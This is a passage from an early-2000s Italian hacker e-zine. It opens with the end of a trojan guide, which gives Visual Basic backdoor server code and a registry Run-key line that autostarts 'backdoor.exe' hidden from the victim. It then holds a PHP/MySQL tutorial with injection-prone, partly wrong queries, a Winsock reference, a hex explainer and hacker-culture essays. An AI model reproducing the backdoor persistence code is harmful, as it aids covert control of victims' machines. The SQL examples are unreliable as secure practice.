Ragazzi,siamo solo a metà guida,ci manca la costruzione del server, ovvio che dipende tutto da lui !! Prima di crearvi il vostro server accertatevi di scrivere prima di tutto " On Error GoTo x " per evitare che il programma si chiuda. CODICE SERVER : Private Sub Winsock_DataArrival(ByVal bytesTotal As Long) Dim strData As String Winsock.GetData strData, vbString Select Case strData Case Is = "mess" MsgBox "Scrivi qua il msg da inviare alla vittima" Case Is = "esegui" Shell "telnet.exe", 1 End Select End Sub Ecco,sono bastate poche righe per capire il funzionamento di quasi tutti i trojan. Se ci pensate bene anche i normali programmi come le chat funzionano in questo modo. Ora basta rendere il server invisibile alla vittima e farlo partire automaticamente all'avvio di windows con questo comando : Set ws = CreateObject("WScript.Shell") ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan", "wscript.exe c:\windows\backdoor.exe %" (ammettendo che la backdoor si trova in c:\windows) Bene, con questo ho finito, se ci sono domande o dubbi da chiarire come ho detto prima scrivetemi una Mail a holyhack@libero.it. 26/12/001 ore: 23:31 quando finisco di scrivere questa Guida per "ELekTro" EleKtro.: www.mondohackers.cjb.net [Commentino di Elektro: X-System.cjb.net ;))] |--------------------------------------------------| |Art. N° <20> : "Guida al MySQL con PHP" di Bigalex| |--------------------------------------------------| ++++¤¤} Guida al MySQL con PHP {¤¤++++ Salve a tutti...dato che in tantissimi mi chiedevano di scrivere una nuova guida (e-zines ecc ecc), ho pensato di scrivere un tutorial su come utilizzare il MySQL con il PHP. Il MySQL è un database che è possibile interrogare dall'interno del codice PHP per rendere più dinamiche le proprie pagine web. Ho deciso tuttavia di scrivere il tutorial per tutti coloro che abbiano già un minimo fondamento di PHP (il PHP è grande ed io nn ho abbastanza tempo per trattarlo tutto :), anche perchè esistono già moltissime guide che trattano del PHP, tuttavia molto poche sono quelle che trattano del MySQL, ed ancor di meno quelle che lo fanno in modo chiaro. Per questo ho quindi deciso di scrivere questo tutorial. ++++¤¤} Comandi basilari del MySQL {¤¤++++ Prima di pensare ai comandi basilari del MySQL, dovreste conoscere la struttura: in pratica un database contiene delle 'tabelle' che a loro volta contengono 'righe' e 'colonne'. Non è possibile scrivere in un database se prima non si costruisce una tabella ed, all'interno della tabella, delle colonne. Le righe possono essere inserite dal PHP quando l'utente che visita un determinato sito web decide ad esempio di registrarsi al sito, inviando i propri dati che vengono appunto salvati in delle righe. Se non sapete come costruire tabelle, vi rimando alla guida di MySQL o allo script di gestione dei database PHPMyAdmin, ottimo per la configurazione dei database in locale ed in remoto. Passiamo ora ai comandi di base del MySQL. I comandi di base del MySQL sono pochi: quelli che occorrono per inserire righe, modificarle ed eliminarle. Un altro comando indispensabile, è SELECT. Vedremo anche l' utilizzo di quest'ultimo. Per inserire una riga occorre richiamare il comando INSERT INTO. Ad esempio, vogliamo inserire due variabili nella tabella 'utenti' che contiene due colonne: 'user' e 'pass'. Le variabili che voglio inserire sono $user e $pass. Il comando da lanciare sarà INSERT INTO utenti (user, pass) VALUES ('$user', '$pass'); (nel PHP non occorre inserire il ; dato che viene fatto in automatico. Se inserite un ; riceverete un errore e probabilmente si bloccherà l'esecuzione dello script). Per modificare una riga (che quindi già esiste), dovete usare il comando UPDATE. Mettiamo ad esempio che io abbia una tabella chiamata 'utenti' che abbia all'interno tre colonne: user email e pass. L'utente vuole modificare l'email e la password. Abbiamo così tre variabili: $user, $email e $pass. Lanciamo quindi il comando per aggiornare il nostro database: UPDATE utenti (email, pass) SET ('$email', '$pass') WHERE user = '$user'; In questo modo sostituiremo la vecchia password e la vecchia email con i nuovi dati fornitici dall'utente. (Il WHERE verrà trattato in seguito) Per eliminare una riga, utilizzeremo invece il comando DELETE. Per utilizzare il comando DELETE, come anche con UPDATE, abbiamo bisogno di una variabile che indichi al database quale riga eliminare, quella che quindi passeremo a 'WHERE', cioè la condizione con la quale il database può decidere se eliminare o meno una determinata riga. In questo caso, utilizzeremo la variabile $user, che corrisponde alla colonna user della tabella utenti (il nome utente in genere è unico e quindi dovremmo essere sicuri di eliminare un unico valore, quello legato a quell'utente). Il comando da utilizzare sarà quindi: DELETE FROM utenti WHERE user = '$user'; In questo modo tutte le righe con il valore user coincidente con la variabile $user verranno eliminate. Passiamo ora al comando SELECT: questo comando serve a visualizzare delle righe, in modo da poter ad esempio leggere username e pass per poter effettuare un login. Mettiamo ad esempio di voler leggere i valori di tutte le colonne (*) della tabella utenti (e dato che non utilizziamo la condizione, cioè WHERE, ci verranno proposte anche tutte le righe). Dovremo quindi utilizzare il comando SELECT * FROM utenti; In questo modo riceveremo in una variabile PHP tutte le righe con tutti i valori della tabella utenti. Nel caso in cui volessimo prendere un solo account, possiamo invece usare la condizione WHERE user = '$user'. Vediamo cosa accade: SELECT * FROM utenti WHERE user = '$user'; In questo modo riceveremo tutte i valori di tutte le righe che hanno nella colonna user il valore della variabile $user. Vediamo ora invece com'è possibile inviare con il PHP le query che permettono di inserire, modificare, cancellare e visualizzare righe. +++¤¤} I comandi PHP per MySQL {¤¤+++ I comandi per utilizzare i database sono relativamente pochi: il primo, il più facile e quello più importante è quello relativo alla connessione al database (eheh). Il comando da inserire nel PHP è mysql_connect(host, user, pass). Con questo comando ci colleghiamo quindi ad un server con hostname (o ip) 'host', nome utente 'user' e password 'pass'. Faccio subito un esempio: mysql_connect("localhost", "bigalex", "ciauzz"); Fatto questo, se il login e l'hostname sono corretti mi collego ad un server. Per controllare l'avvenuta connessione, il PHP può creare una variabile in cui imposta valore 1 se la connessione ha avuto successo, altrimenti valore nullo. Per controllare, quindi posso fare così: $var = mysql_connect("localhost", "bigalex", "ciauzz"); Per controllare l'avvenuta connessione aggiungo una riga... if (!$var) { echo "Impossibile collegarsi al database"; exit; } Et voilà...se non si collega, esce dallo script avvisandomi. Continuiamo il nostro tour nel mondo del MySQL :) Il secondo comando (fondamentale) è mysql_select_db(database). Questo comando ci consente di selezionare un database su cui operare. Per selezionare un database, basta richiamare il comando inviando come variabile database, il nome del nostro database, un esempio rapido di questo comando è mysql_select_db("prova"); Passiamo ancora avanti...ora possiamo fare una query al database. Il comando per eseguirla è mysql_query(sql); Questo comando restituisce una variabile con il risultato della query (ad esempio con $result = mysql_query($sql); abbiamo in $result il risultato della query). Proviamo subito a fare una semplice query. Avendo un database chiamato prova ed una tabella chiamata utenti con all'interno due campi: user e pass. E'sottointeso che nel database ci debbano essere delle righe, altrimenti non possiamo richiedere alcun valore! :) Ad esempio, un utente si è registrato col nick bigalex. Vogliamo vedere la sua password per effettuare il login. mysql_connect("localhost", "username", "password"); /* essendo in localhost è praticamente sicuro che avvenga la connessione :) */ mysql_select_db("prova"); $result = mysql_query("SELECT * FROM utenti WHERE nick = 'bigalex'"); Abbiamo ora il risultato nella variabile $result. Fin qui tutto ok, ma come facciamo a leggerlo? Facendo echo $result non è possibile essendo un risultato di una query MySQL. Come si fa allora? E beh si utilizza un comando del PHP per leggere le variabili in MySQL, no? ;D ihihih...allora...per leggere i risultati delle query di MySQL basta usare il comando mysql_fetch_row(result). Questo comando restituisce un array con tutti i campi selezionati (in questo caso *, quindi tutti). Un esempio: $row = mysql_fetch_row($result); Avremo quindi in $row tutte le colonne richieste nella query. Nel caso in cui le righe siano più di una, bisogna richiedere per ogni riga un mysql_fetch_row. Procediamo con un esempio: // esistono più righe nel risultato $result! while ($row = mysql_fetch_row($result)) { echo "$row[0] -> $row[1]
\n"; } In questo modo per ogni riga ci verrà mostrato la prima colonna, una freccia, e la seconda colonna. Nel caso in cui vogliamo invece inserire, modificare o cancellare delle righe, ci possiamo affidare al comando mysql_query. Questo comando infatti non consente solo di mostrare delle righe, ma di fare query di qualsiasi genere. Una volta fatta una query ed ottenuta una variabile (mettiamo ad esempio $result), possiamo vedere se la query ha avuto effetto su una o più righe (ci viene dato il numero esatto delle righe sulle quali ha avuto effetto quella query). Procediamo sempre con un esempio: // dopo aver avuto $result echo "La query ha avuto effetto su " . mysql_affected_rows(); Questo comando tuttavia non vale per il comando SELECT. Per quest'ultimo bisogna usare mysql_num_rows($result). Volendo è possibile assegnare ad una variabile il risultato dei 2 comandi e verificare semplicemente che il valore sia maggiore di 0, in modo da verificare l'avvenuto aggiornamento senza badare al numero di righe su cui ha avuto effetto la query. Per essere più chiaro faccio un esempio: $num_righe = mysql_num_rows(); if ($num_righe > 0) echo "Il comando ha avuto effetto"; else echo "Il comando non ha avuto effetto"; Con questo termino il tutorial, ricordandovi di chiudere la connessione al database con mysql_close(); Nota dell'ultimo minuto: nella costruzione del mio sito, ho avuto dei problemi con le virgolette: se ci fate caso, inserendo una virgoletta in un INSERT INTO si possono avere vari problemi di sicurezza, anche seri!! Per questa ragione i coders del PHP hanno inserito un comando mooolto utile per tutti coloro che giocano come noi con i database :) Il comando è addslashes e funziona nel seguente modo: bisogna assegnare ad una variabile il risultato del richiamo di addslashes(variabile). Il risultato sarà compatibile con il MySQL. Esempio: $variabile = addslashes($variabile); In questo modo aggiungiamo semplicemente dei backslash prima delle virgolette, degli apostrofi e dei backslash, aggiornando la variabile $variabile con il nuovo codice compatibile con MySQL. Esempio pratico: $variabile = "abc c'è \\comp"; $variabile = addslashes($variabile); echo $variabile; //ora $variabile sarà diventata "abc c\'è \\\\comp" ++++¤¤} Saluti {¤¤++++ In un tutorial può mancare tutto, tranne che i saluti :) Allora, cominciamo dai tank commandos, mighty, il nuovo arrivato ValK, spyro, e tutti gli altri ke nn vedo mai, poi, marsio, la #noflyzone, goliath, aladdin, an4chr0n (ringraziandolo x il logo in flash 5 x il mio sito), blacksoul, dionakra, crashes, e4m, quasar, raptor, shisha, [elektro], sindon2k (che sta facendo il militare), thegass, x[morph]x, holaz, `advanced, delilah, xpterminator, mezzomatto, _kome_, {kurt} ed omega (iihih, chi nn c'era qua, nn c'era neppure nei log del mirc ;D ) Per eventuali chiarimenti mi trovate in chat su azzurranet al canale #hack o alla mail totalmeltdown@libero.it byezz all! -- BiGAlex Everyday is a strike 4 my head! E-Mail: totalmeltdown@libero.it SiTE: bigalex.cjb.net (f2s sucks!!!) |------------------------------------------| |Art. N° <21> : "How to use Winsock" di e4m| |------------------------------------------| __________________________________________________________________ |"*"|Coded by e4m____________________________________________|*|-|x| |101010101010101010101010101010101010101010101010101010101010101010| |010101010101010101010101010101010101010101010101010101010101010101| |010101010101010111010101001000100010100100101001010101010410101010| |10| \ 01010101 / \101010101/ \/ \01000| |10| ________| 01010101/ /| |01010101/ \1011| |10| |________ 010101 / /0| |0101010| /\ /\ |100| |01| | 101011/ /01| |0101010| /0 \ /01\ |110| |10| ________| 10100/ /010| |0101010| |01 \/010 | |010| |01| |0101010110101/ /0100| |0101001| |010101010| |110| |01| |01010101010_/ \0110| \____ | |010101010| |011|_____ |10| |/ \ | \01010101/ |100|!!!!/ |01|______________/|_______ ___________||_____\010101/_____|011|!!!/ |011010010101010101011101010| |010101001010101010101010101010101|!!/ |010101011010101100100101010| |010101010101010101010101010101010|!/ |010010100101001010010101001|____|010101011101010101010101001101010|/ -------------------------------------------------------------------- | |.| |.| |\./| |\./| . |\./| . \^.\ |\\.//| /.^/ \--.|\ |\\.//| /|.--/ \--.| \ |\\.//| / |.--/ Riecco quel coglione di e4m... \---.|\ |\./| /|.---/ <---Maria,la mia nuova fidanzata! \--.|\ |\./| /|.--/ bahuauhahahahhaah \ .\ |.| /. / AVEVO RAGIONE!!! :D _ -_^_^_^_- \ \\ // / -_^_^_^_- _ by e 4 m - -/_/_/- ^ ^ | ^ ^ -\_\_\- - _____________________________________________________________________________ CIAO,FANS E FANSE! :) ALLORA TUTTO OK? QUEST'OGGI,VISTO KE NON HO UN CAZZO DA FARE..., SCRIVERO UN BEL TUTE , KISSA' SE LA CREW SI RIMETTE A POSTO...FORSE PASSEREMO QUESTO TUTE SULL'E-ZINE ... KE FINE FARA'??? BHOO!!!! VI SEMBRA ORA D'INIZIARE? OK..OK NON MI PRENDETE A PAROLACCE,INIZIO SUBITO!! SE FARO' ERRORI (IL ke sara' molto probabile,non reclamate e cercate di capire)!!! ------------------------------------------------------------------------------ Un saluto a tutta la mia crew B l a c k F o r c e VENITECI A TROVARE SIAMO SU AZZURRA #bfc ihih :).. Bene bene UN saluto (ANZi ADDIO) AL MITIKO MARSIO ke essendo stato sgamato dopo un sabotaggio ad un ftp di un governo amerikano ha deciso di abbandonarci per un bel po! salUTO AL mItiCoP RESINARO ihih abbiamo un fattore comune, mangiamo toast davanti al picci', saluto a FAT|MIKE per la musika slash per la sua stupidaggine Gioker84 x trukki col vb,lui e' il genio, e a tuttE quelle e Quelli ke mi conoscono ;) ------------------------------------------------------------------------------- BENE BENE! oggi parleremo del.. C o n t r o l l o W i n s o c k d e l [V i s u a l B a s i c] Il controllo Winsock è stato integrato nel linguaggio Visual Basic per gestire la comunicazione tra due computer mediante il protocollo TCP/IP. La comunicazione avviene tra due computer, chiamati rispettivamente Client e Server. Il Server deve stare sempre collegato e deve attendere che il Client richieda informazioni. Il controllo è contenuto nel file MSWINSCK.OCX e per usarlo si deve caricare prima nella finestra dei controlli Visual Basic. Prima di iniziare a modificare le proprietà, è bene scegliere tra due diversi tipi di comunicazione: sckTCPProtocol. Il controllo Winsock opera in modalità TCP (Transmission Control Protocol) sckUBPProtocol. Il controllo opera in modalità UDP (User Datagram Protocol) Esso è un controllo di tipo invisibile. Di seguito sono riportate tutte le proprietà del controllo :D Proprietà BytesReceived Restituisce o imposta un valore di tipo Long Integer che indica il numero di bytepresenti nel buffer di ricezione. Proprietà LocalHostName Restituisce o imposta il nome del sistema Host locale su cui è in esecuzione l'applicazione. Il valore è di tipo String. Proprietà LocalIP La proprietà LocalIP restituisce o imposta un valore di tipo String che indica l'indirizzo IP del sistema Host locale. Il formato è il seguente: nnn.nnn.nnn.nnn dove n è una cifra. Proprietà LocalPort Questa proprietà restituisce o imposta un valore del tipo Long Integer indicante il numero della porta del sistema Host locale. Proprietà Protocol La proprietà Protocol imposta o restituisce il protocollo TCP/IP o UDP. Se il valore della proprietà è impostato a 1 allora si sta utilizzando una connessione sckUDPProtocol, se invece è 0 sckTCPProtocol. Proprietà RemoteHost Questa proprietà restituisce o imposta il nome del computer remoto con il quale si vuole stabilire una connessione. Il valore è di tipo String e può essere specificato come indirizzo IP (209.304.231.98) o come DNS (www.sitop.it). Proprietà RemotePort La proprietà RemotePort restituisce o imposta un valore del tipo Long Integer che specifica il numero della porta del computer remoto su cui si è connessi. Proprietà State Questa proprietà indica lo stato della connessione. Ecco i valori restituiti e il rispettivo significato: Valore Descrizione 0 Chiuso 1 Aperto 2 In ascolto 3 In attesa di connessione 4 Risoluzione dell'host 5 Risoluzione dell'host completata 6 Connessione in corso 7 Connessione completata 8 Connessione in chiusura 9 Errore Se questa guida non vi e' servita ad un tubo apritevi l'allegato a questo tute e PROVATELO !! [E4M] TEZKATLIPOKA@LIBERO.IT MEMBERZ OF #BFC WWW.BFC.TOO.IT UN BACIONE DA E4M ;) .... NOPE... NON SONO GAY...BRUTTO FIGLIO DI PU.... :) ALLA PROXYMA. |---------------------------------------| |Art. N° <22> : "Hex 2 Ascii" di BiGAlex| |---------------------------------------| ++++¤¤} Hex 2 ascii {¤¤++++ Salve a tutti, è la vigilia di natale ed io, non avendo nulla da fare, ho deciso di scrivere un tutorial sulla conversione di ascii in hex e vice-versa. La prima cosa da dire è che entrambi, hanno gli stessi caratteri, se così vogliamo dire: essi sono 256. Con un algoritmo, è possibile convertire l'ascii in hex e vice-versa. Come fare? Semplice. I caratteri dell'hex sono nel formato FF, mentre quelli dell'ascii (cioè del codice ascii) sono numerici fino a 255 (da 0 a 255). L'hex, cominciando da 00 e finendo a FF, facendo brevi calcoli, notiamo quindi che (mica sparo palle! :) ha 256 caratteri. Per incrementare il codice hex, bisogna aumentare dapprima la cifra di destra, poi quella di sinistra. Arrivando ad F, cambierà poi quella di sinistra. Un esempio: 00, 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10. Capito? Semplice, no? Ora..mettiamo di voler fare un programma che converta l'ascii in hex. Dobbiamo prendere il codice ascii (mettiamo 213), dividerlo per 16 (cioè un singolo carattere hex, ad es D). Fatto ciò otterremo il numero di sinistra (se maggiore di nove, cioè da dieci in poi, bisogna trasformarlo in lettera. Ciò solo fino a 15, cioè, da 10 a 15 bisogna sostituire da A a F). Per ottenere il numero di destra, bisogna trovare il resto della precedente divisione. Anche per il resto, bisogna trasformare i numeri da 10 a 15 nelle lettere da A a F. Molti linguaggi di programmazione permettono con una funzione di ottenere come risultato di una divisione un numero intero (in visual basic \) ed il resto di una divisione (in visual basic mod). Nel caso in cui vogliate invece trasformare un hex in ascii, il calcolo è più semplice. Bisogna prendere la cifra di sinistra, moltiplicarla per 16, sommare ad essa la cifra di destra..ed otteniamo il suo codice ascii (devo dirvi di sostituire alle lettere i numeri? :) Tutto chiaro? Se no, vengo a casa vostra e vi prendo a sprangate ;D Ciauzz a tutti...specialmente la UIHA, DoS, i TCC e tutte le crew in cui sono (non le ricordo tutte, cazzo (-:)E (uomo coi capelli appizzati ihihih :) Bye allz by BiGAlex! -- BiGAlex Ascolta anche tu radio marja! E-Mail: totalmeltdown@libero.it SiTE: bigalex.cjb.net DATE: 24/12/2001 ############################################################################ 01§010°1010§101Ø010101µ0101-01;010&101ç0101@01010æ1010101·010ß10¢10]101·0101 0«101@01·01`01010@101*01|-----------------------------|1ð01¶01<01010\10101£0 010æ10@10Æ1ß01%01010&10ß| ETICA & RIFLESSIONI |0%101ð0101|010:10&101 01*010&101µ01þ010@10101½|-----------------------------|0°1010¢1010@1010"1010 01<0101!1010+101"010=101%010?101&01^01'01>01(0101)01|0þ10@10ç1ò010K101X01§01 ############################################################################ |----------------------------------------------------------| |Art. N° <23> : "Matrix non esiste. O forse si?" di BiGAlex| |----------------------------------------------------------| ++++¤¤} Matrix non esiste. O forse si? {¤¤++++ Ultimamente, stavo ripensando a matrix...una cazzata direte voi.. eppure pensavo che in realtà, anche se non esiste come ci è presentata nel film una sorta di matrix esiste..non serve per alimentare le macchine, non siamo schiavi di esse...semplicemente è ciò che ci distingue dalle macchine: una nostra realtà che si accentua di notte, ma che coesiste con noi. Potremmo raffigurarla come il subconscio..la parte più nascosta della nostra mente che si 'sfoga' nel sonno, ma che coesiste sempre nella nostra mente, nella nostra personalità: esso ci permette di vedere le cose come le vediamo e non in un altro modo, ma soprattutto, cosa che è impossibile nelle macchine e che richiederebbe una consolle da videogiochi che costerebbe una cifra, permette di simulare una realtà, sia essa malvagia che benevola, una realtà che ci circonda, che ci sembra reale..una realtà nella quale pensiamo e ci muoviamo...una realtà dove ci sono tantissimi personaggi, tutti pensanti, personaggi che si muovono, personaggi che interagiscono con noi, che parlano, leggono, scrivono...magari volano o ci fanno del male...una realtà, LA realtà, la realtà che noi ben conosciamo nel sonno...una realtà che tuttavia muta ogni volta che prendiamo sonno..una realtà a volte indomabile, proprio come la realtà che ci circonda normalmente. Matrix esiste allora? E'vero che è nelle nostre menti? Si chiama matrix o non ha ancora un nome? Tante domande ci girano nella testa... matrix, se così lo/a vogliamo chiamare, esiste ed è proprio nelle nostre menti, tuttavia il nome matrix è inesatto: esso non ci viene mostrato sottoforma di caratteri strani, ma come una serie di impulti elettrici, quelli dell'elettroencefalogramma. Potremmo chiamarlo impulse. Impulse quindi è molto simile a matrix, mentre siamo dentro, tutto ci sembra reale..tuttavia una volta usciti ci rendiamo conto che altro non era che un sogno. Quando siamo dentro, proprio come in matrix, non possiamo muovere gli arti 'reali', ma solo quelli che ci sembrano reali, ma che tali non sono. Di fatti, il cervello si isola quasi completamente dalla realtà, bloccando ogni tipo di muscolo, per evitare di causare danni al nostro corpo (cadute improvvise ecc ecc). La differenza è che in matrix, se ti fai male, questo si ripercuote anche nel mondo reale..in impulse ciò non accade. In impulse sei 'protetto' contro ogni genere di male, tranne quelli che pervengono dal mondo reale. Quando sei in impulse, e qui intendo nel mondo 'irreale', sei invincibile, non puoi morire, non puoi farti alcun male. In impulse hai il pieno controllo del mondo..infatti non puoi morire. Ma ciò non è del tutto vero: non sempre puoi leggere nel pensiero di colui con cui stai parlando, non puoi evitare che certe azioni vengano compiute. In impulse tu credi di avere il potere..ti credi invincibile, ma in realtà non lo sei. Ma qual'è la realtà allora? La verità è questa: non lo sappiamo nemmeno noi. Ricordati: impulse è sempre con te, fino a quando non cessi le tue funzioni vitali. Impulse è. ++++¤¤} Saluti {¤¤++++ Un saluto alla uiha..la crew di marsio, con tanti auguri (d natale e d buona riuscita :) Saluto poi tutti i ragazzi che nn ho salutato negli altri testi... bye allz! -- BiGAlex Everyday is a strike 4 my head! E-Mail: totalmeltdown@libero.it SiTE: bigalex.cjb.net (f2s sucks!!!) |------------------------------------| | Art. N° <24> : "Hackers" di Elektro| |------------------------------------| HACKERS? By Elektro Ma chi sono in realtà questi personaggi di cui spesso parlano i mass-media e ogni tanto anche nel mondo dei cinema? Questa leggenda esiste o si trova anche nel mondo reale di tutti noi? Tutti ne parlano ma nessuno li conosce. Forse nessuno conosce il vero termine di questa parole, poichè esso è usato troppo spesso impropriamente e a perso il suo vero e nobile significato.Infatti c'è una grandissima confusione nella testa di ognuno di noi. Eccovi tre definizioni tutte contrapposte una dall'altra del termine 'hacker': - Colui che abusivamente si introduce in un sistema informatico altrui. [Questa è la classica che trovate nei dizionari...] - Appassionato di informatica: in genere un abile programmatore che conosce fin nei minimi dettagli i vari sistemi operativi. - Molto spesso sono gli stessi autori dei sistemi operativi e proprio per questo li conoscono fin nei minimi dettagli. Raramente attaccano sistemi che non gli competono ma ogni tanto compiono il loro buon hack. Il problema più grande è che molto spesso i giornalisti usano la parola 'hacker' come se avesse significato per il primo termine spiegato e non per il secondo. Così al giorno d'oggi essere hacker equivale ad essere paragonati ad un fuorilegge o a un delinquente. Ma il problema non finisce solo qui. In realtà se ognuno di noi rifletesse un po' di più si renderebbe conto che c'è davvero una gran confusione in ognuno di noi, anche per quelli che davvero pensano di conoscere il vero significato della parola. Basti pensare che il termine hacker può essere anche così definito: - Colui che riesce ad entrare in ogni sistema informatico, senza distinzione se esso sia un piccolo server della piccola ditta sotto casa ai sistemi informatici di uso militari quali NASA o Pentagono... Inoltre si tratta di una persona che conosce tutti i linguaggi di programmazione e che riesce a scrivere qualsiasi tipo di programma si voglia e ha una conoscenza della Rete migliore delle sue stesse tasche... Forse un tempo una persona simile a quella descritta poteva esistere ma ora non più: non credo proprio che nel 2000 possano esistere persone che conoscono TUTTI i linguaggi di programmazione e non credo che la stessa persona abbia una conoscenza così ampia dei sistemi e dei relativi buchi nella sicurezza da riuscire a entrare in TUTTI i sistemi informatici della Rete... O forse no? Ma anche se si riuscisse a dare un'unica definizione del termine Hacker, credo che i problemi legati ad esso non sarebbero comunque finiti! Esistono altre 'categorie' o chiamatele pure come vi pare, legate agli hacker. Eccovele: - Lamer: indica un hacker nato perdente. Negli ultimi tempi la parola va ad indicare quasi in automatico tutti quelli che usano un trojan o un nuke, attività considerate lamah. - Lamah: vedi Lamer. - Wannabe: deriva dall'inglese 'Voler essere'; va ad indicare tutti quelli che vorrebbero diventare hackers. Purtroppo, negli ultimi tempi anche questo termine sta subendo una connotazione negativa, poichè molti lo usano come offesa, credendo che la parola Lamer e Wannabe siano perfetti sinonimi. - Script Kiddies: ovvero "il ragazzo degli script". Si tratta di un individuo generalmente giovane ed inesperto che buca i siti con exploit e/o programmi trovati in rete in siti di sicurezza scritti da altri. - Cracker etico: Si tratta di uno cracker che ha messo le sue capacità al servizio delle legalità: lavora presso aziende di sicurezza più o meno note. - Cyber Warrior: a volte definito anche "Cracker di professione", è colui che ha acquisito capacità molto elevate negli anni ed è un vero e proprio mercenario, che si affida al cliente che paga di più. Alcuni difficilmente attaccheranno multinazionali o grosse aziende, ma altri entrano anche in sistemi governativi o militari senza grossi problemi. Si sentono sporchi ma sono molto pericolosi. - Cracker paranoico: è taciturno, schivo, estremamente paranoico. E' molto abile, sia per le sue capacità tecniche, sia per la sua psicologia. Ha una personalità piuttosto instabile ma è raro trovarsene uno che attacca il proprio sistema. - Smanettone italiano: questa non è una vera e propria sottocategoria di hackers, ma semmai un termine che ho volutamente inserito io come tale. Penso che fra tutte le descrizioni di uno smanettone, la più giusta sia quella che indica uno smanettone come colui appassionato di PC, che ama lavorare con tutto ciò che riguarda un computer o un programma e si dedica alla programmazione con molta passione. Poi si interessa anche delle reti e dell'hacking, ma per le sue scarse conoscenze non può essere definito come un vero hacker. Conclusioni: anche questo brave articolo è finito. Probabilmente non avete imparato qualcosa che vi interesserà o che vi possa aiutare, ma probabilmente vi siete resi conto che il termine 'hacker' ha sotto di lui una lunga storia e probabilmente nessuno riuscirà mai a dare un vero significato ad una parola che viene troppo spesso usata erroneamente o comunque con grande confusione. |----------------------------------------------| | Art. N° <25> : "Il lamah di turno" di Elektro| |----------------------------------------------| . . .S T O R I E D I L A M A H . . . Ovvero gli appuntamenti infiniti... ;-))) Rieccomi a voi ragazzi, con il nostro solito appuntamento.. Chissà se a qualcuno di voi gliene frega qualcosa.. Va beh, questo non è un articolo vero e proprio, è solo una delle tante storielle con uno dei tanti lamah che girano su Internet.. Non riporto nè il nome nè la mail di quel povero imbecille, ma solo le sue parole e relativi errori ortografici/di battitura... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Mail da "lamah" ad "Elektro". Oggetto: "Ciauz" Ciao, mi presento mi chiamo Emilio e sono un esperto proggrammatore che si diverte ad hackerare così solamente per il piacere di far capire che internet è il + grande buco. Tu in che linguaggi proggrammi cosa fai di preciso, rimaniamo in contatto se vuoi e diciamoci le nostre esperienze. Io ho iniziato a proggrammare a soli 5 anni con il vecchio Pascal 1.3 :) Anke io ho 14 anni sono dell'88 un sacco di persone mi hanno sottovalutato ma dopo che gli ho fatto capire chi sono si sono rigreduti. Vieni mai Mirc?? Risp. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Mail da "Elektro" a "lamah". Oggetto: "Ciauz" Ciao Emilio, beh, fatico un bel po' a credere che a 5 anni programmavi in Pascal... Ma sentiamo, ora che linguaggi di pogrammazione/scripting conosci? Si in Irc vado, Mirc no, quello è il client irc più famoso per chi usa i sistemi Microsoft... Strano che tu da esperto programmatore confondi ste' cose... Fatti sentire. Byez Elektro teo1987@libero.it www.mondohackers.cjb.net =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Mail da "lamah" ad "Elektro". Oggetto: "Re: Ciauz" Cmq, io dicevo in irc, io sto di solito su #kills con il nick TRUNKS0 . Io non so proggrammare in molti linguaggi, ma come si dici "non conta la quantita, ma la qualità" Cmq io di solito uso Delphi, c/c++, pascal. tu? [Commento: puoi dirmi il chan, ma come cazzo faccio a venir da te se non mi dici qual cavolo sia il server?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Mail da "Elektro" a "lamah". Oggetto: "Senza oggetto" Ciao Zeus, conosco un minimo di programmazione in Perl e socket sotto Linux, poco di C e le basi del Pascal (anche se con il Pascal 7.0 mi dava un errore con una libreria ma ora dovrebbe essere tutto a posto usando il Pascal 5.5). E d'hacking quanto sai? Byez Elektro teo1987@libero.it www.mondohackers.cjb.net =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Mail da "lamah" ad "Elektro". Oggetto: "Re:" Bhe in proggrammazione fatichi un po, cmq di hacking so quello che c'è da sapere. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Mail da "Elektro" a "lamah". Oggetto: "Sorgenti..." Beh, visto che dici di saper programmare bene perchè non mi mandi qualche tuo sorgente di prog scritti da te? Così vediamo il tuo livello di conoscienze... ;) Byez Elektro teo1987@libero.it www.mondohackers.cjb.net [...Chissà perchè ma poi non l'ho più sentito...] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The End ;) Vi è piaciuta ? Se la risposta è sì, bene, tra due mesi con la prossima uscita dell'e-zine ne troverete altre... Se la risposta è no, mi spiace per voi... NB = se avete log di chattate 'interessanti' e tutte da ridere, mandamele pure, le migliori verranno pubblicate. ;-) |-----------------------------------------------| |Art. N° <26> : "Il lamer Fastidiosus" di Marvin| |-----------------------------------------------| ############################################################################## AVVISO Ogni riferimento a fatti,luoghi o persone reali all'interno di questo testo deve considerarsi puramente casuale.Nel caso siate lamers,fatevi un esame di coscienza e toglietevi di mezzo. -------------------------------------------- ANALISI DI UNA SPECIE:IL LAMER FASTIDIOSUS -------------------------------------------- Come direbbe il buon caro Piero Angela,gli uomini sono animali che pensano molto,ma il lamer non rientra in questa categoria. Schifoso,lurido e dispettoso.Questa è l'analisi del "lamer comunis" che,come tutti gli insetti ha un'intelligenza molto limitata. Andiamo più nel dettaglio:sa ben poco di informatica(circa il 99% dei lamers comunes rispecchia questa descrizione) e,per bucare un server, utilizza l'exploit di turno(di certo non scritto da lui,s'intende).Spesso è ignorante,non ha voglia di sbattersi e sbandiera al mondo intero di essere un hacker solo perchè sa utilizzare discretamente Netbus.Probabilmente questo comportamento è dovuto al fatto che il lamer comunis è spessissimo considerato da tutti come un frustrato,e cerca di farsi bello con le femmine della specie "Gnappa Orribilis" per avere un qualche rapporto interpersonale. NUTRIMENTO Il lamer 